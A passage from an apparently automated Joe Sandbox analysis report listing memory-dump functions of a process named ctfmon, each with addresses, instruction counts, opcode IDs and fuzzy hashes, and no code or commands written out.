                                                            • Instruction Fuzzy Hash: DF320131B0D78E4FE775ABA488616B877D1EF82310F0600B9D48D871E7DE6DAD0A8791
                                                            Function 00007FFD9BA034AF Relevance: .5, Instructions: 489COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f5e46c62615fa5093231d5a0f22b021b7b3f28edf5c53feee14775667eb3b1e
                                                            • Instruction ID: f618b3814946279818a86fe795083a7fd08f7373aaea219da13ffb44d4a4c633
                                                            • Opcode Fuzzy Hash: 1f5e46c62615fa5093231d5a0f22b021b7b3f28edf5c53feee14775667eb3b1e
                                                            • Instruction Fuzzy Hash: CCE11422B0991A4FE714FBACE8A5AECB7A0EF88365F10017BD18DD7197CE2568458790
                                                            Function 00007FFD9BA034D3 Relevance: .5, Instructions: 465COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d59b07755ddf8e30596c6c04e11e677c6929f444de12d7399172af2fe121eb5f
                                                            • Instruction ID: bf998ea12464304c55cc9a9b42ead72b8cda5541d4dd92fd58da4548a35e8134
                                                            • Opcode Fuzzy Hash: d59b07755ddf8e30596c6c04e11e677c6929f444de12d7399172af2fe121eb5f
                                                            • Instruction Fuzzy Hash: EBD11622F0892A4FE714FBACE865AECB7A0FF85361F00017BD19DD7197CE2568458791
                                                            Function 00007FFD9BA048F1 Relevance: .5, Instructions: 461COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d36d18c8889d48e05fe5d9cce39a2fcd26f391e263b7e61583dd985db1a7144
                                                            • Instruction ID: fbb584cb19d0202c016049d486cc1d0782ef07e20c934a2ad1a5d4ae4d783354
                                                            • Opcode Fuzzy Hash: 6d36d18c8889d48e05fe5d9cce39a2fcd26f391e263b7e61583dd985db1a7144
                                                            • Instruction Fuzzy Hash: 5BE1D361F1EA1E4FE7B8EB9884A56B936F1FF95300F52443DD08DC31B6DDA86A018780
                                                            Function 00007FFD9BA035D3 Relevance: .4, Instructions: 354COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 163fa66ca650e4086be32e2cb864685bcfa5ce570bf21613d4009d72c23d7ecc
                                                            • Instruction ID: 124d5be12a5f4e0d70de00665a7f625dc02ea608f87ed09f961e37eecd9bca5d
                                                            • Opcode Fuzzy Hash: 163fa66ca650e4086be32e2cb864685bcfa5ce570bf21613d4009d72c23d7ecc
                                                            • Instruction Fuzzy Hash: 96B1D122F0991D4FEB54FBA8E865BEDBBA0FF89351F0001BAD14DD3196CE2468458B91
                                                            Function 00007FFD9BA02640 Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 917bb8d68b68d54a9c3e0c04088973faa44b99c1630becca520969fbbf7012c5
                                                            • Instruction ID: f76fa09a2158ec56ef6b4311979384ea3890f9acf6ac112eaf98c5bdb293da49
                                                            • Opcode Fuzzy Hash: 917bb8d68b68d54a9c3e0c04088973faa44b99c1630becca520969fbbf7012c5
                                                            • Instruction Fuzzy Hash: ACB11531B0DB4E4FE768EBA888646B67792EF96314F1100B9D04EC72D7CE29AC46C751
                                                            Function 00007FFD9BA00EB5 Relevance: .3, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e1df2d4614b66c23406e79aed2c6f5b2877fb6887e45cfcb15fe652be242211
                                                            • Instruction ID: 4be968a8f5fde1e9dc3847c41571e657e57f8964eb38b92f06aa33c4e8d02de4
                                                            • Opcode Fuzzy Hash: 6e1df2d4614b66c23406e79aed2c6f5b2877fb6887e45cfcb15fe652be242211
                                                            • Instruction Fuzzy Hash: 5081D831B0990D4FDBA8EB6884657FDB7E2EF99710F4501B9E04ED32D2CE646C418741
                                                            Function 00007FFD9BA039E9 Relevance: .2, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 645ad4cbb47deed9bd7fc960a429c1b0662e63f086520f3b9fa2c40abbe34d00
                                                            • Instruction ID: 49259bedf1b1c5a5550e8cabd180e23939a027597f6bc349d42c92080c49219d
                                                            • Opcode Fuzzy Hash: 645ad4cbb47deed9bd7fc960a429c1b0662e63f086520f3b9fa2c40abbe34d00
                                                            • Instruction Fuzzy Hash: 49812D70E0861D8FDB94EFA8C8A5AADBBF1FF59304F5004B9D04DE7295DA789941CB40
                                                            Function 00007FFD9BA00B85 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e020c32a90256dc96a3b157ae03e07e480a9af407e846094e582c7eea0c45434
                                                            • Instruction ID: 8d1e7e9051333ff24067b124840d11b3c6fdc69c6d0dac043cde6dac277f1f43
                                                            • Opcode Fuzzy Hash: e020c32a90256dc96a3b157ae03e07e480a9af407e846094e582c7eea0c45434
                                                            • Instruction Fuzzy Hash: B341282170994D0FD798FB6884A5EB577E2EF99300F0601B6E44EC32EBCD29AD46C341
                                                            Function 00007FFD9BA00CDA Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f865e1e8f5c69b02602698b0f9a00554f7d732bc2898c1ccb8deac2f061c5ad
                                                            • Instruction ID: 924c0d00f3affaccbf31f2129b667437a84c1796def2586d7beede9303f706a4
                                                            • Opcode Fuzzy Hash: 7f865e1e8f5c69b02602698b0f9a00554f7d732bc2898c1ccb8deac2f061c5ad
                                                            • Instruction Fuzzy Hash: 06312D21B0DB880FE758A76C98167B97BD1EF99714F0001BEF48EC31C7CD6868018796
                                                            Function 00007FFD9BA050A9 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 606583cbaedbf2175aa52426028a63fac0dc711ea7a5698f154c9688cf4e96a3
                                                            • Instruction ID: cb74cc50195a9c81ab026ec381d0a5be97f8be6abaf670509a0db8d7f8132982
                                                            • Opcode Fuzzy Hash: 606583cbaedbf2175aa52426028a63fac0dc711ea7a5698f154c9688cf4e96a3
                                                            • Instruction Fuzzy Hash: 96312221B0EA8D4FDB45EBA848756B87BF1EF99200F1A01FBD449D7297CE289D058352
                                                            Function 00007FFD9BA00A76 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22797bc3d904b5adecd607217d7a66af7a711a0785e54dad4dc16f934a58278c
                                                            • Instruction ID: a2d615120514942e33558cc6b13275139ffcdb1efcc60a2889b6a8923d69c7cc
                                                            • Opcode Fuzzy Hash: 22797bc3d904b5adecd607217d7a66af7a711a0785e54dad4dc16f934a58278c
                                                            • Instruction Fuzzy Hash: EA31C131A0991E8FEB64EBB4C4646E9BBF0FF19300F0541B6D449E31A2DE78A984CB50
                                                            Function 00007FFD9BA02488 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5280d8232964b5e232c666907d94cf6d06197f4af150605e69fe9e3c84f34ff2
                                                            • Instruction ID: 5d49db0541321d2dc2074a5da9b48121ba6e3928f7560590f08114fd0c6af284
                                                            • Opcode Fuzzy Hash: 5280d8232964b5e232c666907d94cf6d06197f4af150605e69fe9e3c84f34ff2
                                                            • Instruction Fuzzy Hash: AE213731F1880E4BEB58FFAC98656FD73E2EB98310F1501BBE41DD3285CD69A9014791
                                                            Function 00007FFD9BA009C1 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa0bd8c5cd260d3807a8bee3fdad4d15adf4e78f57f3cad1f9aefd4b64030efc
                                                            • Instruction ID: c2d95afbb515eeff7f5adcd1502db31b7535c8c72e6d9ca2f831599549216acb
                                                            • Opcode Fuzzy Hash: aa0bd8c5cd260d3807a8bee3fdad4d15adf4e78f57f3cad1f9aefd4b64030efc
                                                            • Instruction Fuzzy Hash: 1A11C312F0ED4F0BE7B4A7A914756B63681DFA6A11F0601BBD48DC21A6DD88AD064384
                                                            Function 00007FFD9BA0089D Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f437c30c551319bf3243b4b47e53a9a16046f1374a646250877ac66c66fe0be
                                                            • Instruction ID: a8371df09efd904226f3b6ffd4eec2af7edfc16def4171cad9893d9ce659e9cb
                                                            • Opcode Fuzzy Hash: 9f437c30c551319bf3243b4b47e53a9a16046f1374a646250877ac66c66fe0be
                                                            • Instruction Fuzzy Hash: 4C11593160DB8C0FD7A5E72884741A97BE0EF9A360F01057FE08DC32A2DD69AA468341
                                                            Function 00007FFD9BA009E0 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef25affa98ae7accdba232a237fea2d24749744c919bd0bb68ccd7e3385456cf
                                                            • Instruction ID: f3e9101e6d4ce4a375aeff992ca0ccc7bb52cd78d2915282595f5c071f61aac9
                                                            • Opcode Fuzzy Hash: ef25affa98ae7accdba232a237fea2d24749744c919bd0bb68ccd7e3385456cf
                                                            • Instruction Fuzzy Hash: 87014C02F0ED0F0BE6F4679C14656B625C5DFE6B10F42017AE44DC219ACC88AD064384
                                                            Function 00007FFD9BA00E39 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed5f885e95298f5d9c6aa6923bc0f29b231aef7bc0cf3ecdf0585acae6d6087b
                                                            • Instruction ID: 79470813e4b88e88964ee21daf394fdedd8afa3c2fee009c77c004c11d75b741
                                                            • Opcode Fuzzy Hash: ed5f885e95298f5d9c6aa6923bc0f29b231aef7bc0cf3ecdf0585acae6d6087b
                                                            • Instruction Fuzzy Hash: 97012B20B0E6C80FD357E37898A96B47FD1AF87215F1941FAE08CCB0B3C9984946C342
                                                            Function 00007FFD9BA04064 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 660f777f825f8adaf4b9b24db86333b171eff6593ece3765702bf760ed15d46c
                                                            • Instruction ID: c4d36b3430d7012ecf55f0a80e5f4789bda44f806b0e746f62a5a2e0171a4d75
                                                            • Opcode Fuzzy Hash: 660f777f825f8adaf4b9b24db86333b171eff6593ece3765702bf760ed15d46c
                                                            • Instruction Fuzzy Hash: EEF0F412F0A80E0BEBA4AB6C14AA2FD77E2FF99211F61007ED48DD31B6DC086D064341
                                                            Function 00007FFD9BA04F11 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73aeb45ee263cdc24f6d4e8b17c53a4bb2dc92f32560347dbd7691a31022dc43
                                                            • Instruction ID: e9790dad0522381722ddd58e7e7374c50de421cbf397e7298f73429171b1286e
                                                            • Opcode Fuzzy Hash: 73aeb45ee263cdc24f6d4e8b17c53a4bb2dc92f32560347dbd7691a31022dc43
                                                            • Instruction Fuzzy Hash: D1014920B0E1860AE72923B844303F82B61AF87358F4601FAD4ADCE1F7CD9E29968351
                                                            Function 00007FFD9BA0518D Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc4fc61791e4d8bb600b19de62df998d7452cb7e29aed47bae88ccd6b016ce11
                                                            • Instruction ID: ee838bd0250136399b8315494726cf6f2c0da116c119ae169fe2527b809889c8
                                                            • Opcode Fuzzy Hash: fc4fc61791e4d8bb600b19de62df998d7452cb7e29aed47bae88ccd6b016ce11
                                                            • Instruction Fuzzy Hash: 2BF0A431F0540E8BEB64FB9C98A51FD73F2EB98310F150476D44DF3295CD24AA028B90
                                                            Function 00007FFD9BA00DF6 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bee9a6aa60600c72b8e539b73c5740d81ca11cae69a914f4a7497ff8eb0198c7
                                                            • Instruction ID: c365cad02f550ee4e362777b451b1a16a26792e331dc5bbad711c4a6e9d7f944
                                                            • Opcode Fuzzy Hash: bee9a6aa60600c72b8e539b73c5740d81ca11cae69a914f4a7497ff8eb0198c7
                                                            • Instruction Fuzzy Hash: 08E02B7290E64C1EEB18AA59FC17CF67B98DA97334B00005FF59DC1163E1526563C255
                                                            Function 00007FFD9BA03C81 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66749df09586078a303e620bccc3860f36a6f2b491b5d8368f386fe141fa25b7
                                                            • Instruction ID: 91de4fbf94405117a901500e50c3fc616c1c5141a2e754af19e1b502075f7485
                                                            • Opcode Fuzzy Hash: 66749df09586078a303e620bccc3860f36a6f2b491b5d8368f386fe141fa25b7
                                                            • Instruction Fuzzy Hash: 6EE0DF3195EE0C5BDB24AB5ABC2068876E1FB8E308F0102AAE48CC3191D7665B59C301
                                                            Function 00007FFD9BA04D65 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 155200945b34eecb651837d6dd8872c6cd1857fd7b77ecf08a23bd63dc72d5ab
                                                            • Instruction ID: ce9dc38581de74bf5c7f79be2064ac7c464847e09d40ad761d1d84056cd8c88b
                                                            • Opcode Fuzzy Hash: 155200945b34eecb651837d6dd8872c6cd1857fd7b77ecf08a23bd63dc72d5ab
                                                            • Instruction Fuzzy Hash: C4E0C03280EA0C8BDB44AB985C202E833B0FF4A308F01006DE08CC31A0DB715A44C340
                                                            Function 00007FFD9BA04EF0 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8461882dcbebaddd66321bd6c5a1d6995b1e8e9028f3facc686d7e21e2f6852
                                                            • Instruction ID: 2579d049506098d598b3e681f35583c66f08216ce14f598d97b8c66c376865c5
                                                            • Opcode Fuzzy Hash: f8461882dcbebaddd66321bd6c5a1d6995b1e8e9028f3facc686d7e21e2f6852
                                                            • Instruction Fuzzy Hash: 48D0028194F3C94FD70352B61C791947F706E1701178E41EBC9C5DB2A7E49E49898323
                                                            Function 00007FFD9BA00CC0 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0eef4ac1751eeed90cfd1730c59f50bff1dfd871d737e56bb89dde4e1ff689fa
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: 0eef4ac1751eeed90cfd1730c59f50bff1dfd871d737e56bb89dde4e1ff689fa
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340

                                                            Executed Functions

                                                            Function 00007FFD9B9E1222 Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 19f89e6de9cc2154b40f33fa73ca2363ff0fdb95d0bca70f8bfc228a0f13f803
                                                            • Instruction ID: e4c25f69a7d0ebea2107cb8d28b561f3cb5489c3182496ff0f92da3e262d6a04
                                                            • Opcode Fuzzy Hash: 19f89e6de9cc2154b40f33fa73ca2363ff0fdb95d0bca70f8bfc228a0f13f803
                                                            • Instruction Fuzzy Hash: 79C1AB20B2E69E1FE369AB7884612B53BD1EF96314F0640BED48EC71E7DD1DAD428341
                                                            Function 00007FFD9B9E276D Relevance: .7, Instructions: 679COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3de871229e17669c30f2796c0c05dc3f9e6032f6482812b5dd5e623e8a953440
                                                            • Instruction ID: 05cbe7b958015dea658e11e6303ff2d23c2384a03ca1e9b588f3489e652d9a80
                                                            • Opcode Fuzzy Hash: 3de871229e17669c30f2796c0c05dc3f9e6032f6482812b5dd5e623e8a953440
                                                            • Instruction Fuzzy Hash: A6324631F2D68E5FE775ABA488216B837D1EF82310F0600B9D44D871E7DE1DAE4A8791
                                                            Function 00007FFD9B9E48F1 Relevance: .5, Instructions: 464COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65613ef61bba5f46096e01a339ef898bf0663c95aacbf2b6efc4e60cedec4d9d
                                                            • Instruction ID: 56c38f24a907a8edf3d7558b8a9bea0060c29d8cde10f6f87e23ec36f8f847f2
                                                            • Opcode Fuzzy Hash: 65613ef61bba5f46096e01a339ef898bf0663c95aacbf2b6efc4e60cedec4d9d
                                                            • Instruction Fuzzy Hash: ABE19161B2A91EAEE7B8DB9884A57BD37E1EF94300B56447DD00DC33E2DD286B418381
                                                            Function 00007FFD9B9E3568 Relevance: .4, Instructions: 412COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebb399da70dcf5d2fadfb2928629f41929ea3936679cca86a203161b77de577e
                                                            • Instruction ID: 35c2e78ae7559fa0c7f4b2dcf909eba490d96e20d06c2fdb30dc30a881284827
                                                            • Opcode Fuzzy Hash: ebb399da70dcf5d2fadfb2928629f41929ea3936679cca86a203161b77de577e
                                                            • Instruction Fuzzy Hash: 18C1F232F1C51A5EEB55FBACE8A5AEDBBA0EF84320F00017BE04DD7197DE2469458B50
                                                            Function 00007FFD9B9E35D3 Relevance: .4, Instructions: 355COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a87cee9616bf4a3e53007021c4f19df715276a34a729169206fb7ed477af7a7
                                                            • Instruction ID: 5519b499ad604571e10d00a2e9ff7db348acb358ef810a59a8465a08529a1847
                                                            • Opcode Fuzzy Hash: 0a87cee9616bf4a3e53007021c4f19df715276a34a729169206fb7ed477af7a7
                                                            • Instruction Fuzzy Hash: 0BB1D032F1D51D5EEB54FBA8E865AEDBBA0FF84320F0001BBE04DD7296DE2469458B50
                                                            Function 00007FFD9B9E2640 Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6d525240634d86becb74567669e91c49361cf4c1ecc9002a2a90cdd166e852b
                                                            • Instruction ID: 81d9647bedd6cb8fef2202ccdfb498379ff69ca95706b32a5a4ca58414ee6a4f
                                                            • Opcode Fuzzy Hash: e6d525240634d86becb74567669e91c49361cf4c1ecc9002a2a90cdd166e852b
                                                            • Instruction Fuzzy Hash: A8B12631B1DA4E5FE768EBA8C8606B67392EF85314F1500B9D00EC72D7CE29AD46C750
                                                            Function 00007FFD9B9E0F0F Relevance: .2, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
